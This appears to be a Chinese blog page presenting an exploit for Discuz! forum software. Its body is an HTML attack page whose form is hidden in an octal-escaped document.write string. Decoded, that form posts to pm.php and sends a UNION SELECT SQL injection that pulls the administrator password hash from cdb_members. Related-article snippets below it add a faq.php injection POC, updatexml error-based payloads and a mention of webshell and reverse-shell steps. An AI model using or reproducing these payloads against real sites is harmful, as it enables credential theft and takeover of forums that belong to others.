discuz my.php注入,Discuz! pm.php注入EXP

最新推荐文章于 2024-05-01 07:38:21 发布
最新推荐文章于 2024-05-01 07:38:21 发布
阅读量202 收藏
点赞数
文章标签: discuz my.php注入

<html><br />

<head><br />

<meta http-equiv="Content-Type" content="text/html; charset=gb2312"><br />

<title>Dz 0day by Jackal</title><br />

<SCRIPT LANGUAGE="JavaScript"><br />

<!--<br />

function ReplaceDemo(temp){<br />

var r, re;<br />

re = /(S+)(s+)(S+)/g;<br />

r = temp.replace(re, "$3$2$1");<br />

return(r);<br />

}<br />

//--><br />

</SCRIPT><br />

</head><br />

<style>BODY {    FONT-SIZE: 9pt;    COLOR: #000000;    FONT-FAMILY: "Courier New";    scrollbar-face-color:#E4E4F3;    scrollbar-highlight-color:#FFFFFF;    scrollbar-3dlight-color:#E4E4F3;    scrollbar-darkshadow-color:#9C9CD3;    scrollbar-shadow-color:#E4E4F3;    scrollbar-arrow-color:#4444B3;    scrollbar-track-color:#EFEFEF;}<br />

TABLE {    FONT-SIZE: 9pt;    FONT-FAMILY: "Courier New";    BORDER-COLLAPSE: collapse;    border-top-width: 1px;    border-right-width: 1px;    border-bottom-width: 1px;    border-left-width: 1px;    border-top-style: solid;    border-right-style: none;    border-bottom-style: none;    border-left-style: solid;    border-top-color: #d8d8f0;    border-right-color: #d8d8f0;    border-bottom-color: #d8d8f0;    border-left-color: #d8d8f0;}<br />

.tr {    font-family: "Courier New";    font-size: 9pt;    background-color: #e4e4f3;    text-align: center;}<br />

.td {    font-family: "Courier New";    font-size: 9pt;    background-color: #f9f9fd;}<br />

.warningColor {    font-family: "Courier New";    font-size: 9pt;    color: #ff0000;}<br />

input {    font-family: "Courier New";    BORDER-TOP-WIDTH: 1px;    BORDER-LEFT-WIDTH: 1px;    FONT-SIZE: 12px;    BORDER-BOTTOM-WIDTH: 1px;BORDER-RIGHT-WIDTH: 1px;    color: #000000;}<br />

textarea {    font-family: "Courier New";    BORDER-TOP-WIDTH: 1px;    BORDER-LEFT-WIDTH: 1px;    FONT-SIZE: 12px;    BORDER-BOTTOM-WIDTH: 1px;    BORDER-RIGHT-WIDTH: 1px;    color: #000000;}<br />

A:link {    FONT-SIZE: 9pt;     COLOR: #000000;    FONT-FAMILY: "Courier New";     TEXT-DECORATION: none;}<br />

tr {    font-family: "Courier New";    font-size: 9pt;    line-height: 18px;}<br />

td {    font-family: "Courier New";    font-size: 9pt;    border-top-width: 1px;    border-right-width: 1px;    border-bottom-width: 1px;    border-left-width: 1px;    border-top-style: none;    border-right-style: solid;    border-bottom-style: solid;    border-left-style: none;    border-top-color: #d8d8f0;    border-right-color: #d8d8f0;    border-bottom-color: #d8d8f0;    border-left-color: #d8d8f0;}<br />

.trHead {    font-family: "Courier New";    font-size: 9pt;    background-color: #e4e4f3;    line-height: 3px;}<br />

.inputLogin {    font-family: "Courier New";    font-size: 9pt;    border: 1px solid #d8d8f0;    background-color: #f9f9fd;    vertical-align: bottom;}<br />

</style><br />

<body><br />

<SCRIPT LANGUAGE="JavaScript"><br />

<!--<br />

document.write("\74\123\103\122\111\120\124\40\114\101\116\107\125\101\107\105\75\42\112\141\166\141\123\143\162\151\160\164\42\76\15\12\74\41\55\55\15\12\164\145\163\164\75\47\167\151\144\164\150\75\42\67\66\60\42\40\74\164\141\142\154\145\40\141\154\151\147\156\75\42\143\145\156\164\145\162\42\40\142\157\162\144\145\162\75\42\60\42\40\143\145\154\154\163\160\141\143\151\156\147\75\42\60\42\76\74\146\157\162\155\40\143\145\154\154\160\141\144\144\151\156\147\75\42\60\42\40\150\145\151\147\150\164\75\42\62\62\42\40\155\145\164\150\157\144\75\42\160\157\163\164\42\76\74\164\162\76\74\164\144\40\105\170\160\74\57\164\144\76\74\57\164\162\76\74\164\162\76\74\164\144\40\143\154\141\163\163\75\42\164\144\42\76\46\156\142\163\160\73\104\172\65\56\60\40\150\145\151\147\150\164\75\42\61\70\42\40\143\154\141\163\163\75\42\164\162\110\145\141\144\42\76\46\156\142\163\160\73\74\57\164\144\76\74\57\164\162\76\74\164\162\76\74\164\144\40\74\151\156\160\165\164\40\143\154\141\163\163\75\42\164\144\42\76\46\156\142\163\160\73\46\156\142\163\160\73\125\162\154\72\40\164\171\160\145\75\42\164\145\170\164\42\40\156\141\155\145\75\42\164\150\145\101\143\164\151\157\156\42\40\166\141\154\165\145\75\42\150\164\164\160\72\57\57\63\70\60\60\150\153\56\143\157\155\42\40\151\144\75\42\164\150\145\101\143\164\151\157\156\42\40\157\156\102\154\165\162\75\164\150\151\163\56\146\157\162\155\56\164\150\145\62\101\143\164\151\157\156\56\166\141\154\165\145\75\164\150\151\163\56\146\157\162\155\56\164\150\145\101\143\164\151\157\156\56\166\141\154\165\145\53\42\57\160\155\56\160\150\160\77\141\143\164\151\157\156\75\163\145\156\144\46\160\155\163\165\142\155\151\164\75\171\145\163\42\76\74\102\122\76\74\151\156\160\165\164\40\163\151\172\145\75\42\65\60\42\40\164\171\160\145\75\42\150\151\144\144\145\156\42\40\156\141\155\145\75\42\164\150\145\62\101\143\164\151\157\156\42\40\166\141\154\165\145\75\42\42\76\46\156\142\163\160\73\110\141\163\150\72\40\151\144\75\42\164\150\145\62\101\143\164\151\157\156\42\40\164\171\160\145\75\42\164\145\170\164\42\40\74\151\156\160\165\164\40\166\141\154\165\145\75\42\60\60\71\64\142\64\70\70\42\76\46\156\142\163\160\73\46\156\142\163\160\73\46\156\142\163\160\73\115\163\147\164\157\72\74\151\156\160\165\164\40\156\141\155\145\75\42\146\157\162\155\150\141\163\150\42\40\156\141\155\145\75\42\155\163\147\164\157\42\40\164\171\160\145\75\42\164\145\170\164\42\40\166\141\154\165\145\75\42\152\141\143\153\141\154\42\76\74\102\122\76\74\151\156\160\165\164\40\163\151\172\145\75\42\61\60\42\40\156\141\155\145\75\42\163\165\142\152\145\143\164\42\40\164\171\160\145\75\42\150\151\144\144\145\156\42\40\166\141\154\165\145\75\42\141\141\42\76\74\151\156\160\165\164\40\163\151\172\145\75\42\61\60\42\40\156\141\155\145\75\42\155\145\163\163\141\147\145\42\40\164\171\160\145\75\42\150\151\144\144\145\156\42\40\74\151\156\160\165\164\40\166\141\154\165\145\75\42\141\141\42\76\46\156\142\163\160\73\46\156\142\163\160\73\123\121\114\72\40\163\151\172\145\75\42\61\60\60\42\40\164\171\160\145\75\42\164\145\170\164\42\40\166\141\154\165\145\75\42\60\51\40\156\141\155\145\75\42\155\163\147\164\157\142\165\144\144\171\163\133\135\42\40\163\145\154\145\143\164\40\165\156\151\157\156\40\146\162\157\155\40\160\141\163\163\167\157\162\144\54\62\54\60\40\167\150\145\162\145\40\143\144\142\137\155\145\155\142\145\162\163\40\143\154\141\163\163\75\42\164\144\42\40\165\151\144\75\61\57\52\42\76\74\57\164\144\76\74\57\164\162\76\74\164\162\76\74\164\144\40\164\171\160\145\75\42\163\165\142\155\151\164\42\40\141\154\151\147\156\75\42\143\145\156\164\145\162\42\76\74\151\156\160\165\164\40\166\141\154\165\145\75\42\40\156\141\155\145\75\42\123\165\142\155\151\164\42\40\42\40\107\117\107\117\107\117\40\164\171\160\145\75\42\162\145\163\145\164\42\40\157\156\103\154\151\143\153\75\42\164\150\151\163\56\146\157\162\155\56\141\143\164\151\157\156\75\164\150\151\163\56\146\157\162\155\56\164\150\145\62\101\143\164\151\157\156\56\166\141\154\165\145\73\42\76\74\151\156\160\165\164\40\166\141\154\165\145\75\42\40\156\141\155\145\75\42\123\165\142\155\151\164\63\62\42\40\42\76\74\57\164\144\76\74\57\164\162\76\74\164\162\76\74\164\144\40\122\145\163\145\164\40\150\145\151\147\150\164\75\42\62\62\42\40\143\154\141\163\163\75\42\164\162\110\145\141\144\42\76\46\156\142\163\160\73\74\57\164\144\76\74\57\164\162\76\74\164\162\76\74\164\144\40\143\154\141\163\163\75\42\164\144\42\76\120\157\167\145\162\145\144\40\141\154\151\147\156\75\42\162\151\147\150\164\42\40\74\141\40\102\171\40\164\151\164\154\145\75\42\121\121\72\65\60\61\71\62\65\62\70\42\76\112\141\143\153\141\154\74\57\141\76\40\150\162\145\146\75\42\150\164\164\160\72\57\57\150\151\56\142\141\151\144\165\56\143\157\155\57\144\145\154\157\166\145\162\57\42\40\74\57\164\162\76\40\62\60\60\67\56\63\46\156\142\163\160\73\74\57\164\144\76\40\74\57\164\141\142\154\145\76\40\74\57\146\157\162\155\76\47\73\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\122\145\160\154\141\143\145\104\145\155\157\50\164\145\163\164\51\51\15\12\57\57\55\55\76\15\12\74\57\123\103\122\111\120\124\76")<br />

//--><br />

</SCRIPT><br />

</body></html>

蜗牛小姐CC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理
Au
10-18 4166
源码~   http://pan.baidu.com/s/1gfkvJrX poc /faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20fr...
discuz my.php注入,Discuz! 7.2 插件/manyou/sources/notice.php sql注入漏洞
weixin_35044481的博客
03-26 159
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。/manyou/sources/notice.phpif($option == 'del') {$appid = intval($_GET['appid']);$db->query("DELETE FROM {$tablepre}...
discuz论坛注入木马
小刚的博客
06-20 4663
今天试了一下很牛逼的一套流程 对discuz论坛挂马,利用菜刀上传webshell,并反向shell获取控制权,最后更改文件权限。 虽然是我看众多视频学来的,但很多知识还是挺有用的,今天就结合一下,搞一波我的虚拟机。 实验环境: VM搭建的虚拟测试环境 1.centos7安装的discuzs3.3论坛http://10.10.10.64/upload/forum.php 2.kali 10.10....
Discuz! X系列全版本后台sql注入漏洞
weixin_53303754的博客
10-15 335
1’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1)-- a //查询数据库并得到flag。1’ and updatexml(1,concat(0x7e,(SELECT version())),1)-- a //查询当前版本。1’ and updatexml(1,concat(0x7e,(SELECT user())),1)-- a //查询当前用户。
php7.2 webshell,Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞
weixin_34732336的博客
03-18 224
对于dz,我们比较关心的是拿shell,但dz的东西想拿shell太难太难了,上一篇文章的末尾铺垫了下,所以这篇文章也算不上马后炮了...这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有补。这个漏洞其实也是老漏洞,去年大家就已经知道了,是二次写配置文件的漏洞,就是年初创始人通过后台ucenter拿shell漏洞的另外的利用办法。 很多人知道了,uc.p...
.exp文件_thinkphp 3.2.3 exp注入漏洞分析
weixin_39798626的博客
11-25 288
1.EXP注入漏洞分析:在官网下载thinkphp3.2.3然后在ThinkPHPConfconvention.php配置好MySQL帐号密码再添加一行,用来打印sql语句'SHOW_PAGE_TRACE' =>true,ApplicationHomeControllerIndexController.class.php漏洞代码public exphttp://127.0.0.1/index...
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
注入代码中,我们看到注入者利用了Discuz!的查询逻辑。注入者通过巧妙构造的gids参数,使得原本安全的代码片段被注入SQL攻击代码。具体来说,注入代码通过操作gids参数,使得implodeids()函数在构造SQL查询时,...
精华贴展示插件digest.php插件 for Discuz!7.0.rar
07-14
《精华贴展示插件digest.phpDiscuz!7.0中的应用详解》 Discuz!作为一款广泛应用的社区论坛软件,其丰富的插件系统为用户提供了无数的个性化和功能扩展可能。今天我们要深入探讨的是“精华贴展示插件digest.php”...
Python写的Discuz7.2版faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- ...
攻防世界-unseping
m0_49025459的博客
12-17 2885
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
江苏工匠杯_unseping_wp
shelter1234567的博客
10-15 5994
关键字:江苏工匠杯 unseping 攻防世界 ctf解题wp 网络安全
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
最新发布
2401_84297796的博客
05-01 407
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 4455
Discuz!X全版本存在SQL注入漏洞。漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
ListView条目item中 添加按钮或者图片 弹出对话框
android_0327的博客
10-09 9426
UI布局 效果 <ListView android:id="@+id/lv" android:dividerHeight="10dp" android:layout_width="match_parent" android:layout_height="0dp" android:layout_marginBottom
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7304
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
Discuz!7.2 SQL注入复现实验
Tranquillity
10-23 2187
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出现错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
DZ 结构分析(转)
fjgysai的专栏
11-21 1435
 前言:为方便互联网数万Discuz!爱好者,更加深入了解Discuz!软件,本人在熟悉Discuz!过程中,顺便将个人经验写给大家。本贴内容由本人定期更新。本贴只介绍Discuz!中部分技术点,本贴紧属个人观点,不足之处,请各位多多指教,在下先此谢过!。“Discuz!”在下文中简称“DZ”。要弄DZ二次开发,必须至少具备如下技能:1) 能够理很好理解MVC构架的原理(虽然DZ不是MVC架构
php discuzSQL注入_discuzphp防止sql注入函数
weixin_35020639的博客
03-08 121
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql防注入函数取了来!复制代码 代码如下:$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslas...
xss and ssrf bypass 小tips
yggcwhat
04-26 1744
xss and ssrf bypass 小tips
Comsenz Inc.编码规范 - Discuz! PHP与数据库设计指南
Discuz! 编码规范》是由Comsenz Inc.制定的一套详细的编程准则,旨在提升代码质量和团队协作效率。这套规范涵盖了PHP编码、数据库设计、模板设计以及文件与目录管理等多个方面,强调一致性、可读性和安全性。 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值